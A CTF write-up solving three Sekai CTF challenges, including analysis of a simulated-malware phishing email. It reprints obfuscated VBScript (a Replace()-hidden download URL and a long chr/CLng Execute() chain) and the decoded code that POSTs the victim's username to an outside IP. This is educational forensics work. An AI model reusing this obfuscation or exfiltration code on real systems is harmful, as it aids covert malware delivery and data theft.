Sekai CTF
The following are writups for 3 different challenges that I completed this past weekend during Sekai CTF hosted by the team Project Sekai. The writeups include 2 Forensics challenges and 1 Reverse Engineering challenge.
Challenges:
Forensics - DEF CON Invitation
Forensics - Eval Me
For this challenge, we were given a single packet capture file capture.pcapng along with a server to connect to nc challs.sekai.team 9000.
I started off by taking on the packet capture first, looking through the protocol hierarchy, we can see most packets are TCP with a subsection of the TCP packets being HTTP.
After a bit of looking around, I started looking at the TCP streams, if we take a look at TCP stream number 4, we can see some suspicious “data” being sent in the HTTP packets.
clicking through the TCP streams, the data seems to be in hexadecimal form, and goes on for 50 total TCP streams.
Rather than manually copy the data of each packet, I wrote a quick tshark command to grab the data contained in each stream.
tshark -r capture.pcapng -Y "http.request.method == \"POST\"" -T fields -e json.value.string | tr "\n" " "
Converting this data from hex to ascii using CyberChef, the data given doesn’t seem like much that we can use to get the flag. At least not yet.
Next, I tried connecting to the server given in the challenge description to see if that could be the missing piece of this challenge.
Upon connecting, we can see that it is a simple pwntools math challenge, that can’t be completed by hand or else the server will return Too slow.
I got to work coding up a quick script to solve this, and after a few attempts fixing my formatting of the received data, I had the following code to show for it:
from pwn import *
r = remote('chals.sekai.team',9000)
r.recvuntil(b':)')
while(True):
try:
line = r.recv().decode().replace('\n', '').replace('correct', '')
print(line, ' = ', eval(line))
r.sendline(str(eval(line)).encode())
except:
print(line)
r.interactive()
The code is simple enough, it uses pwntools to connect to the server, then it formats itself to properly receive the equation, and tries to evaluate it and send that evaluated string as an answer. If it can’t evaluate it, then it puts you into interactive mode and prints out the last line.
After running the code, I got the following response after completing the 100th equation.
This definitely looks suspicious, so I grabbed the curl request and put it in my terminal to see what the link contained.
From this we can see a lot of stuff is going on. We have the flag.txt file that is being grabbed and a key, s3k@1_v3ry_w0w, that is used to XOR that flag. There also seems to be another curl request to an IP that is then sent to /dev/null.
Seeing the XOREncrypt() function and knowing the data that we got earier was unreadable, the very first thing I tried was XORing that key with the data we grabbed earlier from the packet capture using tshark.
From this we can now see the flag and were able to successfully complete this challenge!
Flag: SEKAI{3v4l_g0_8rrrr_8rrrrrrr_8rrrrrrrrrrr_!!!_8483}
Forensics - DEF CON Invitation
For this challenge we were given an email message file DEFCON_Finals_Invitation.eml, along with a warning that the challenge contained simulated malware.
Opening up the email in a text editor we can see two main sections, a primary text section, and a calendar invite section.
Decoding the text section from base64 and throwing it into an HTML tester, we can see what seems to be a legitimate DEF CON CTF invitation, all the links went to twitter, linkedin, or other legitimate websites.
Next I tried decoding the calendar invite section to see if it had any useful data for us. At first I didn’t notice anything out of the ordinary, however of the two links contained in the calendar invite, one seemed to stand out as suspicious.
Traveling to the link for the “Venue Maps” (In a VM of course), we can see what again appears to be a legitimate website, it shows a map of Caesars Forum and gives you a button to download an offline version.
Wait a minute, a button to download an offline version? Based on our malware warning in this challenge, that can’t be out of the goodness of their hearts.
Viewing the page source we can see that our suspicions were correct, we see a very shady javascript function that loads an obfuscated link when the Download Offline Map Image button is clicked.
Reverse Engineering the link, it is another google api link similar to the one before, however this time it downloads a Visual Basic Script file when you go to the website.
Viewing the script file, we can see a lot of code. After looking through it for a bit we can see what most definitely is some kind of ransomware along with a very long Replace() function.
ewkjunfw = Replace("68IlllIllIIIllllIllII74IlllIllIIIllllIllII74IlllIllIIIllllIllII70IlllIllIIIllllIllII73IlllIllIIIllllIllII3aIlllIllIIIllllIllII2fIlllIllIIIllllIllII2fIlllIllIIIllllIllII64IlllIllIIIllllIllII6fIlllIllIIIllllIllII77IlllIllIIIllllIllII6eIlllIllIIIllllIllII6cIlllIllIIIllllIllII6fIlllIllIIIllllIllII61IlllIllIIIllllIllII64IlllIllIIIllllIllII31IlllIllIIIllllIllII36IlllIllIIIllllIllII34IlllIllIIIllllIllII37IlllIllIIIllllIllII2eIlllIllIIIllllIllII6dIlllIllIIIllllIllII65IlllIllIIIllllIllII64IlllIllIIIllllIllII69IlllIllIIIllllIllII61IlllIllIIIllllIllII66IlllIllIIIllllIllII69IlllIllIIIllllIllII72IlllIllIIIllllIllII65IlllIllIIIllllIllII2eIlllIllIIIllllIllII63IlllIllIIIllllIllII6fIlllIllIIIllllIllII6dIlllIllIIIllllIllII2fIlllIllIIIllllIllII6cIlllIllIIIllllIllII31IlllIllIIIllllIllII38IlllIllIIIllllIllII38IlllIllIIIllllIllII75IlllIllIIIllllIllII32IlllIllIIIllllIllII64IlllIllIIIllllIllII35IlllIllIIIllllIllII33IlllIllIIIllllIllII32IlllIllIIIllllIllII71IlllIllIIIllllIllII67IlllIllIIIllllIllII33IlllIllIIIllllIllII66IlllIllIIIllllIllII4fIlllIllIIIllllIllII6fIlllIllIIIllllIllII4cIlllIllIIIllllIllII70IlllIllIIIllllIllII69IlllIllIIIllllIllII6cIlllIllIIIllllIllII63IlllIllIIIllllIllII49IlllIllIIIllllIllII38IlllIllIIIllllIllII39IlllIllIIIllllIllII70IlllIllIIIllllIllII30IlllIllIIIllllIllII5fIlllIllIIIllllIllII68IlllIllIIIllllIllII34IlllIllIIIllllIllII45IlllIllIIIllllIllII30IlllIllIIIllllIllII63IlllIllIIIllllIllII47IlllIllIIIllllIllII4cIlllIllIIIllllIllII6aIlllIllIIIllllIllII6bIlllIllIIIllllIllII5fIlllIllIIIllllIllII75IlllIllIIIllllIllII76IlllIllIIIllllIllII42IlllIllIIIllllIllII55IlllIllIIIllllIllII69IlllIllIIIllllIllII61IlllIllIIIllllIllII67IlllIllIIIllllIllII37IlllIllIIIllllIllII45IlllIllIIIllllIllII5fIlllIllIIIllllIllII72IlllIllIIIllllIllII4dIlllIllIIIllllIllII5aIlllIllIIIllllIllII2dIlllIllIIIllllIllII48IlllIllIIIllllIllII35IlllIllIIIllllIllII2dIlllIllIIIllllIllII6dIlllIllIIIllllIllII65IlllIllIIIllllIllII39IlllIllIIIllllIllII4bIlllIllIIIllllIllII72IlllIllIIIllllIllII39IlllIllIIIllllIllII53IlllIllIIIllllIllII51IlllIllIIIllllIllII4cIlllIllIIIllllIllII56IlllIllIIIllllIllII51IlllIllIIIllllIllII61IlllIllIIIllllIllII4bIlllIllIIIllllIllII53IlllIllIIIllllIllII69IlllIllIIIllllIllII4bIlllIllIIIllllIllII63IlllIllIIIllllIllII45IlllIllIIIllllIllII76IlllIllIIIllllIllII4aIlllIllIIIllllIllII4fIlllIllIIIllllIllII2dIlllIllIIIllllIllII45IlllIllIIIllllIllII6bIlllIllIIIllllIllII66IlllIllIIIllllIllII54IlllIllIIIllllIllII53IlllIllIIIllllIllII55IlllIllIIIllllIllII71IlllIllIIIllllIllII57IlllIllIIIllllIllII6cIlllIllIIIllllIllII72IlllIllIIIllllIllII4eIlllIllIIIllllIllII36IlllIllIIIllllIllII53IlllIllIIIllllIllII7aIlllIllIIIllllIllII58IlllIllIIIllllIllII67IlllIllIIIllllIllII49IlllIllIIIllllIllII30IlllIllIIIllllIllII4cIlllIllIIIllllIllII59IlllIllIIIllllIllII42IlllIllIIIllllIllII68IlllIllIIIllllIllII2dIlllIllIIIllllIllII46IlllIllIIIllllIllII35IlllIllIIIllllIllII65IlllIllIIIllllIllII6dIlllIllIIIllllIllII34IlllIllIIIllllIllII49IlllIllIIIllllIllII41IlllIllIIIllllIllII34IlllIllIIIllllIllII69IlllIllIIIllllIllII58IlllIllIIIllllIllII33IlllIllIIIllllIllII74IlllIllIIIllllIllII4fIlllIllIIIllllIllII49IlllIllIIIllllIllII47IlllIllIIIllllIllII68IlllIllIIIllllIllII30IlllIllIIIllllIllII45IlllIllIIIllllIllII6aIlllIllIIIllllIllII34IlllIllIIIllllIllII36IlllIllIIIllllIllII47IlllIllIIIllllIllII6cIlllIllIIIllllIllII77IlllIllIIIllllIllII76IlllIllIIIllllIllII4cIlllIllIIIllllIllII4fIlllIllIIIllllIllII66IlllIllIIIllllIllII54IlllIllIIIllllIllII38IlllIllIIIllllIllII70IlllIllIIIllllIllII7aIlllIllIIIllllIllII76IlllIllIIIllllIllII75IlllIllIIIllllIllII79IlllIllIIIllllIllII39IlllIllIIIllllIllII31IlllIllIIIllllIllII55IlllIllIIIllllIllII74IlllIllIIIllllIllII65IlllIllIIIllllIllII6aIlllIllIIIllllIllII31IlllIllIIIllllIllII72IlllIllIIIllllIllII32IlllIllIIIllllIllII49IlllIllIIIllllIllII30IlllIllIIIllllIllII6aIlllIllIIIllllIllII67IlllIllIIIllllIllII37IlllIllIIIllllIllII59IlllIllIIIllllIllII73IlllIllIIIllllIllII55IlllIllIIIllllIllII4eIlllIllIIIllllIllII63IlllIllIIIllllIllII73IlllIllIIIllllIllII73IlllIllIIIllllIllII50IlllIllIIIllllIllII74IlllIllIIIllllIllII65IlllIllIIIllllIllII64IlllIllIIIllllIllII35IlllIllIIIllllIllII30IlllIllIIIllllIllII38IlllIllIIIllllIllII64IlllIllIIIllllIllII73IlllIllIIIllllIllII6bIlllIllIIIllllIllII57IlllIllIIIllllIllII52IlllIllIIIllllIllII70IlllIllIIIllllIllII6bIlllIllIIIllllIllII41IlllIllIIIllllIllII49IlllIllIIIllllIllII2fIlllIllIIIllllIllII79IlllIllIIIllllIllII65IlllIllIIIllllIllII61IlllIllIIIllllIllII35IlllIllIIIllllIllII33IlllIllIIIllllIllII35IlllIllIIIllllIllII68IlllIllIIIllllIllII76IlllIllIIIllllIllII67IlllIllIIIllllIllII70IlllIllIIIllllIllII33IlllIllIIIllllIllII32IlllIllIIIllllIllII76IlllIllIIIllllIllII6dIlllIllIIIllllIllII76IlllIllIIIllllIllII2fIlllIllIIIllllIllII64IlllIllIIIllllIllII65IlllIllIIIllllIllII66IlllIllIIIllllIllII63IlllIllIIIllllIllII6fIlllIllIIIllllIllII6eIlllIllIIIllllIllII2dIlllIllIIIllllIllII66IlllIllIIIllllIllII6cIlllIllIIIllllIllII61IlllIllIIIllllIllII67IlllIllIIIllllIllII2eIlllIllIIIllllIllII70IlllIllIIIllllIllII6eIlllIllIIIllllIllII67IlllIllIIIllllIllII2eIlllIllIIIllllIllII58IlllIllIIIllllIllII4fIlllIllIIIllllIllII52IlllIllIIIllllIllII65IlllIllIIIllllIllII64", "IlllIllIIIllllIllII", " ")
Putting the string in CyberChef and replacing all the IlllIllIIIllllIllII sections, we are returned with a hexadecimal string, converting that to ascii we get another link.
From this link we are given what is presumably the flag, defcon-flag.png.XORed,however it is XOR encrypted and is unreadable in it’s current form.
I initially tried XORing with a known plaintext crib, knowing that a png will start with the hex bytes 89 50 4E 47 0D 0A 1A 0A. However this still did not decode the image into a readable form.
Scrolling down to the end of the Visual Basic Script file, we can see another Replace function, along with a very long Execute() statement.
First, converting the replace function to readable text by replacing the ###############_### strings with z’s, reversing the string, and converting from base64 only returned us with a file path c:\temp\defcon-flag.png.compromised that presumably is part of the ransomware.
Next, I attempted to decode the following Execute() statement at the bottom of the file
Execute(chr(-40321+CLng("&H9dc5"))&chr(-70744+CLng("&H114c1"))&chr(5810790/CLng("&Hd03e"))&chr(CLng("&H10547")-66855)&chr(-3061+CLng("&Hc5d"))&chr(-45300+CLng("&Hb168"))&chr(-82986+CLng("&H1449e"))&chr(CLng("&Hb3cd")-45917)&chr(-52601+CLng("&Hcdb3"))&chr(412416/CLng("&H3258"))&chr(CLng("&H151d5")-86402)&chr(228260/CLng("&H8d4"))&chr(10781272/CLng("&H16b0e"))&chr(1011488/CLng("&H7b79"))&chr(1832272/CLng("&H44d2"))&chr(5369872/CLng("&Hb4d4"))&chr(4496972/CLng("&H976f"))&chr(CLng("&H50fc")-20620)&chr(2185408/CLng("&H10ac6"))&chr(-52470+CLng("&Hcd33"))&chr(CLng("&Hae92")-44658)&chr(1925915/CLng("&H7049"))&chr(3243984/CLng("&H6f28"))&chr(CLng("&H8465")-33792)&chr(6893402/CLng("&H1159a"))&chr(CLng("&H1865a")-99814)&chr(7719531/CLng("&H12a8f"))&chr(6937859/CLng("&H1570d"))&chr(CLng("&H15e12")-89520)&chr(4552170/CLng("&Ha7c1"))&chr(CLng("&H2255")-8688)&chr(CLng("&Hac94")-44081)&chr(CLng("&H1a97")-6691)&chr(2325400/CLng("&He317"))&chr(-5584+CLng("&H15f2"))&chr(-7668+CLng("&H1e4b"))&chr(CLng("&H15388")-86815)&chr(-94815+CLng("&H172cd"))&chr(773712/CLng("&H29fa"))&chr(CLng("&H73d3")-29535)&chr(-78318+CLng("&H13262"))&chr(-73308+CLng("&H11ecc"))&chr(3320602/CLng("&H119fb"))&chr(6514908/CLng("&H12484"))&chr(CLng("&H1618f")-90406)&chr(-42549+CLng("&Ha6a3"))&chr(757080/CLng("&H2913"))&chr(-64938+CLng("&Hfe1e"))&chr(-6196+CLng("&H18a8"))&chr(-89307+CLng("&H15d4b"))&chr(4081058/CLng("&Hc269"))&chr(-90118+CLng("&H1606b"))&chr(8398725/CLng("&H12255"))&chr(8410194/CLng("&H118ca"))&chr(4653373/CLng("&Hb3f9"))&chr(-16734+CLng("&H41d1"))&chr(-53427+CLng("&Hd127"))&chr(CLng("&Ha90")-2658)&chr(-73912+CLng("&H120ed"))&chr(-44067+CLng("&Hac51"))&chr(CLng("&Hc6f7")-50886)&chr(-6573+CLng("&H19cf"))&chr(CLng("&H8770")-34631)&chr(-30549+CLng("&H775f"))&chr(CLng("&H6ccf")-27787)&chr(-44385+CLng("&Hadca"))&chr(-56936+CLng("&Hded5"))&chr(-79243+CLng("&H135ab"))&chr(5253885/CLng("&Haf69"))&chr(5514294/CLng("&Hbcf3"))&chr(9784152/CLng("&H161e2"))&chr(-45614+CLng("&Hb268"))&chr(2846656/CLng("&H15b7e"))&chr(2912364/CLng("&H613c"))&chr(CLng("&H10c")-154)&chr(-47877+CLng("&Hbb71"))&chr(CLng("&H13bff")-80863)&chr(CLng("&H12427")-74730)&chr(CLng("&H1853")-6195)&chr(2908802/CLng("&H14e31"))&chr(CLng("&H14efe")-85654)&chr(1275188/CLng("&H2af1"))&chr(10193848/CLng("&H15746"))&chr(11147136/CLng("&H184c8"))&chr(CLng("&H12636")-75260)&chr(3405526/CLng("&H11b0a"))&chr(CLng("&H19af")-6528)&chr(-39708+CLng("&H9b4e"))&chr(-96693+CLng("&H179e5"))&chr(-22347+CLng("&H5779"))&chr(288022/CLng("&H16f6"))&chr(341808/CLng("&H1bd1"))&chr(-69824+CLng("&H110f6"))&chr(1218034/CLng("&H676f"))&chr(1882550/CLng("&H9313"))&chr(-757+CLng("&H32a"))&chr(961152/CLng("&H4e38"))&chr(-15412+CLng("&H3c62"))&chr(3469336/CLng("&H1049e"))&chr(-42129+CLng("&Ha4c7"))&chr(2664242/CLng("&Hdd6e"))&chr(-40503+CLng("&H9eaa"))&chr(-90302+CLng("&H16123"))&chr(-42602+CLng("&Ha6d8"))&chr(9294100/CLng("&H16b0d"))&chr(-76127+CLng("&H129b4"))&chr(5576810/CLng("&Hbd6e"))&chr(CLng("&H4330")-17099)&chr(CLng("&Ha65c")-42474)&chr(-17723+CLng("&H457f"))&chr(1122193/CLng("&H2d31"))&chr(9787616/CLng("&H14998"))&chr(CLng("&Ha632")-42449)&chr(-60037+CLng("&Heaa7"))&chr(-77885+CLng("&H13047"))&chr(CLng("&H100ae")-65700)&chr(CLng("&Hc8ae")-51287)&chr(3921015/CLng("&H91df"))&chr(CLng("&H89ec")-35192)&chr(CLng("&Hcfb3")-53067)&chr(688320/CLng("&H5406"))&chr(-4949+CLng("&H13bd"))&chr(1852984/CLng("&H3e66"))&chr(-43801+CLng("&Hab8d"))&chr(CLng("&Hd5fd")-54669)&chr(82610/CLng("&H2045"))&chr(-17393+CLng("&H4411"))&chr(1553664/CLng("&Hbda8"))&chr(965336/CLng("&H3848"))&chr(-35284+CLng("&H8a35"))&chr(CLng("&H185de")-99698)&chr(-84365+CLng("&H149f9"))&chr(CLng("&H1918")-6392)&chr(745062/CLng("&H3f45"))&chr(-90998+CLng("&H163c5"))&chr(3006416/CLng("&H68db"))&chr(3092822/CLng("&H779e"))&chr(-61400+CLng("&Hf046"))&chr(1062840/CLng("&H67cb"))&chr(-41458+CLng("&Ha214"))&chr(4687760/CLng("&He4e5"))&chr(-57357+CLng("&He05c"))&chr(-79180+CLng("&H1359f"))&chr(CLng("&H92ad")-37465)&chr(537336/CLng("&H3dbc"))&chr(2021096/CLng("&Hb36e"))&chr(-36862+CLng("&H901e"))&chr(-77402+CLng("&H12ecf"))&chr(CLng("&Hb635")-46531)&chr(9907704/CLng("&H1665a"))&chr(CLng("&H111c2")-70038)&chr(198400/CLng("&H1838"))&chr(CLng("&H11aa")-4452)&chr(CLng("&Hd1ea")-53641)&chr(2742660/CLng("&H6333"))&chr(-616+CLng("&H2db"))&chr(-36786+CLng("&H9017"))&chr(-85678+CLng("&H14ed7"))&chr(CLng("&H15b53")-88905)&chr(1489152/CLng("&Hb5c8"))&chr(-97172+CLng("&H17bb4"))&chr(CLng("&H47d2")-18319)&chr(5112094/CLng("&Hcdde"))&chr(-60888+CLng("&Hee44"))&chr(8839368/CLng("&H13fb6"))&chr(-90342+CLng("&H16106"))&chr(574494/CLng("&H30c9"))&chr(3875270/CLng("&Hb662"))&chr(CLng("&Had05")-44192)&chr(8657428/CLng("&H12389"))&chr(CLng("&Ha0e6")-41108)&chr(10075255/CLng("&H185ab"))&chr(2702621/CLng("&H5d6d"))&chr(-7029+CLng("&H1bea"))&chr(CLng("&H119dd")-72056)&chr(4786990/CLng("&Ha29a"))&chr(5295052/CLng("&Hb24f"))&chr(CLng("&H170ad")-94309)&chr(3536717/CLng("&H88c9"))&chr(7051609/CLng("&H11bf9"))&chr(CLng("&H40b1")-16461)&chr(6524903/CLng("&Hfc5b"))&chr(1190958/CLng("&H28cf"))&chr(1780880/CLng("&Hadea"))&chr(-90695+CLng("&H16269"))&chr(CLng("&Hf76d")-63274)&chr(-46351+CLng("&Hb57e"))&chr(8922760/CLng("&H13cdc"))&chr(3997824/CLng("&H86a0"))&chr(CLng("&H76a6")-30273)&chr(CLng("&H13c73")-80901)&chr(-27648+CLng("&H6c74"))&chr(CLng("&H5357")-21290)&chr(625800/CLng("&H1d1a"))&chr(2721532/CLng("&H57dc"))&chr(9212560/CLng("&H1414f"))&chr(-92336+CLng("&H16915"))&chr(-11725+CLng("&H2def"))&chr(-78226+CLng("&H131be"))&chr(-70612+CLng("&H113f4"))&chr(-39585+CLng("&H9ac3"))&chr(-45013+CLng("&Hb036"))&chr(9987488/CLng("&H15c56"))&chr(-23122+CLng("&H5ac2"))&chr(-25596+CLng("&H6468"))&chr(4912320/CLng("&Hb6c0"))&chr(7827336/CLng("&H134d8"))&chr(CLng("&H11ba2")-72513)&chr(-92487+CLng("&H169bb"))&chr(3941910/CLng("&H92a6"))&chr(1843821/CLng("&H40e3"))&chr(-56461+CLng("&Hdcfb"))&chr(-61934+CLng("&Hf21d"))&chr(CLng("&H5f42")-24280)&chr(CLng("&H4419")-17318)&chr(4139190/CLng("&H91aa"))&chr(-75399+CLng("&H126f5"))&chr(CLng("&H4df8")-19926)&chr(CLng("&H9a11")-39400)&chr(CLng("&H5dc0")-23990)&chr(2981792/CLng("&H16bfd"))&chr(1532672/CLng("&Hbb18"))&chr(2153581/CLng("&H7d8f"))&chr(-65706+CLng("&H1010b"))&chr(CLng("&H5c39")-23501)&chr(-34626+CLng("&H87ae"))&chr(1699296/CLng("&Hcf6f"))&chr(-22022+CLng("&H5634"))&chr(CLng("&Hbeca")-48759)&chr(1239472/CLng("&H2ff0"))&chr(2990020/CLng("&H6a2e"))&chr(8229900/CLng("&H1417b"))&chr(-37756+CLng("&H93a4"))&chr(CLng("&H9f82")-40800)&chr(-46661+CLng("&Hb6c0"))&chr(-88679+CLng("&H15a89"))&chr(-14462+CLng("&H38a0"))&chr(CLng("&H8998")-35107)&chr(-16696+CLng("&H41ab"))&chr(5105651/CLng("&Hc577"))&chr(8351412/CLng("&H11e2a"))&chr(-59947+CLng("&Hea99"))&chr(3276078/CLng("&H83ee"))&chr(CLng("&H351f")-13490)&chr(-98033+CLng("&H17f56"))&chr(3164040/CLng("&H16b84"))&chr(CLng("&H10180")-65886)&chr(CLng("&H15089")-86095)&chr(CLng("&H5768")-22342)&chr(2594166/CLng("&H12a0b"))&chr(CLng("&H94c")-2346)&chr(2624672/CLng("&H14065"))&chr(2408364/CLng("&Hf792"))&chr(-90152+CLng("&H16048"))&chr(CLng("&H14396")-82723)&chr(2373244/CLng("&H4feb"))&chr(-77666+CLng("&H12fd4"))&chr(CLng("&He4f0")-58523)&chr(9367210/CLng("&H13e2e"))&chr(-63799+CLng("&Hf99c"))&chr(CLng("&H14926")-84148)&chr(2481696/CLng("&H12ef1"))&chr(CLng("&H16de7")-93633)&chr(2574368/CLng("&H13a41"))&chr(CLng("&H2c4b")-11305)&chr(CLng("&H265")-579)&chr(-40503+CLng("&H9e59"))&chr(4132625/CLng("&H8125"))&chr(-71305+CLng("&H116ab"))&chr(100286/CLng("&H98e"))&chr(-75948+CLng("&H128b6"))&chr(2497041/CLng("&H8d5d"))&chr(3596670/CLng("&H7fb9"))&chr(-57401+CLng("&He09d"))&chr(-79614+CLng("&H1371e"))&chr(CLng("&Hcb27")-51920)&chr(596925/CLng("&H1635"))&chr(909672/CLng("&H1ea2"))&chr(-21809+CLng("&H5599"))&chr(929440/CLng("&H16b10"))&chr(-95594+CLng("&H17574"))&chr(648546/CLng("&H1639"))&chr(9058993/CLng("&H15e5d"))&chr(CLng("&H6785")-26386)&chr(-5603+CLng("&H1603"))&chr(-49243+CLng("&Hc098"))&chr(-19842+CLng("&H4da2"))&chr(5837755/CLng("&H12827"))&chr(-41927+CLng("&Ha43a"))&chr(5987802/CLng("&He316"))&chr(-23591+CLng("&H5c89"))&chr(CLng("&H5c64")-23541)&chr(1368240/CLng("&H2c8a"))&chr(-15661+CLng("&H3d55"))&chr(3041198/CLng("&H15d67"))&chr(6633060/CLng("&H13475"))&chr(834704/CLng("&H1f5a"))&chr(-10043+CLng("&H279c"))&chr(CLng("&H139bb")-80205)&chr(CLng("&Hd675")-54794)&chr(CLng("&Hcbce")-52142)&chr(-26539+CLng("&H6824"))&chr(-89161+CLng("&H15cb8"))&chr(-93440+CLng("&H16d75"))&chr(CLng("&Hb89c")-47228)&chr(5950782/CLng("&He3e5"))&chr(CLng("&H10c56")-68583)&chr(CLng("&H14769")-83703)&chr(440768/CLng("&H35ce"))&chr(CLng("&Hdfc7")-57166)&chr(-95272+CLng("&H17497"))&chr(CLng("&H75ec")-30071)&chr(-6274+CLng("&H18f4"))&chr(2752992/CLng("&H1500f"))&chr(7865946/CLng("&H1365e"))&chr(-21227+CLng("&H535a"))&chr(CLng("&H1589f")-88112)&chr(-14544+CLng("&H3940"))&chr(-8877+CLng("&H2312"))&chr(9332496/CLng("&H13fc8"))&chr(-90440+CLng("&H161a9"))&chr(-70593+CLng("&H11435"))&chr(CLng("&H83d6")-33645)&chr(CLng("&H13dc6")-81239)&chr(-24982+CLng("&H6204"))&chr(CLng("&H18426")-99333)&chr(-67803+CLng("&H108fd"))&chr(724548/CLng("&H4053"))&chr(820896/CLng("&H6435"))&chr(3032718/CLng("&H6465"))&chr(750484/CLng("&H1dea"))&chr(-6853+CLng("&H1b14"))&chr(4453275/CLng("&He7f1"))&chr(6003447/CLng("&H128d9"))&chr(CLng("&H4438")-17354)&chr(7633548/CLng("&H11419"))&chr(-55530+CLng("&Hd963"))&chr(-50437+CLng("&Hc530"))&chr(10170066/CLng("&H150ab"))&chr(6335798/CLng("&Hfc8b"))&chr(5513909/CLng("&H1270d"))&chr(-956+CLng("&H42a"))&chr(-5050+CLng("&H1420"))&chr(CLng("&H12d54")-77029)&chr(-89365+CLng("&H15d87"))&chr(CLng("&H12d37")-77002)&chr(CLng("&Hbfac")-48971)&chr(-33319+CLng("&H829b"))&chr(-88979+CLng("&H15bfc"))&chr(-12181+CLng("&H3004"))&chr(9532490/CLng("&H15283"))&chr(-30608+CLng("&H77bc"))&chr(CLng("&H166e6")-91846)&chr(CLng("&Hb99b")-47481)&chr(2215916/CLng("&Hfe96"))&chr(-20719+CLng("&H5118"))&vbcrlf)
Being as I did not want to run this code, and my knowledge of Visual Basic Scripts was limited, I decided to script it using python instead. The following was what I ended up with:
f = open('cling.txt', 'r').read().split('&chr')
key = ''
for i in f:
if i[:3] == "chr" or i[:5] != "(CLng":
temp1 = i.replace('chr', '').replace('(', '').replace(')', '').replace('\"', '').split("CLng&H")
temp2 = int(temp1[1],16)
key += chr(int(eval(temp1[0]+str(temp2))))
else:
temp1 = i[:-1].replace('(', '').replace('\"', '').replace("CLng&H", '').split(")")
temp2 = int(temp1[0],16)
key += chr(int(eval(str(temp2)+temp1[1])))
print(key)
While it isn’t the prettiest code, it gets the job done.
Reading in the line from a file, I first had to convert the data inside each CLng() statement from hexadecimal to decimal.
Then I had to evaluate the equation inside each chr() statement using the new decimal value.
Finally I converted the resulting number to ascii using chr() and appended that character onto a string, which when printed gave me the following result:
Dim http: Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
Dim url: url = "http://20.106.250.46/sendUserData"
With http
Call .Open("POST", url, False)
Call .SetRequestHeader("Content-Type", "application/json")
Call .Send("{""username"":""" & strUser & """}")
End With
res = Msgbox("Thank you for your cooperation!", vbOKOnly+vbInformation, "")
From this result I used reqbin to send a post request for me to the url provided with the json value of {"username": "admin"}.
The result was a key and a msg saying Data compromised!.
Using that key, I was then able to XOR the encrypted image with the UTF-8 key and the result looked much better than my previous attempts.
Opening the image, this time it worked! I was able to see the following image along with what looked like a flag.
Finally, turning the image upside down we can see the flag and successfully have solved this challenge.
Flag: SEKAI{so_i_guess_we'll_get_more_better_next_year-_-}
RE - Azusawa’s Gacha World
For this challenge, we were given a zip file dist.zip that contained a custom built unity game Asusawa's Gacha World.exe and all of the data.
Opening up the game, we are greeted with a fullscreen menu that is completely in Japanese, a language that I have zero experience reading.
Luckily, google translate has a lot of experience reading Japanese, and I was able to translate the menu to english instead of blindly clicking.
Since I had the 100 crystals needed to get 1 draw I tried that, unsurprisingly though I didn’t receive a flag.
Next, I looked into the Gacha details tab, and quickly realized why I didn’t receive a flag:
Based on this image, it seems like we can only receive what is presumably a flag on our 1,000,000th withdrawal.
I tried clicking around some more but couldn’t find a way to get more crystals, so I looked up tools to reverse engineer a unity exe.
I quickly found a useful tool that I could use to look into the code of how the game is determining draws, for this I used JetBrains dotPeek.
Uploading the Assembly-CSharp.dll file that I found within the World_Data/Managed/ directory, I was able to start digging through the game’s code.
Looking through the RequestClasses tab, I was quickly able to determine how requests were sent for each draw in the game.
Right clicking on the GachaRequest() function, I was able to find usages of that function in the code and I stumbled accross this section of code in the GachaManager class
In this we can see a base64 encoded string assigned to a gachaWebRequest variable, if we decode the variable from base64 we get the following URL
Using reqbin I was able to simulate the post requests, and after formatting the json using the previous GachaRequest() function as well as setting the User-Agent header to SekaiCTF I was able to send the request seen below:
While this wasn’t a flag, it was really close! Remembering what the game said earlier about the 1,000,000th draw, I formatted the number of pulls to be 999,999 and sent another request.
With this request, we are returned with a long base64 string named “flag”! Putting that into CyberChef and converting from base64 we get what seems to be a png file.
Saving this file and opening it reveals the following flag!
Flag: SEKAI{D0N7_73LL_53G4_1_C0P13D_7H31R_G4M3}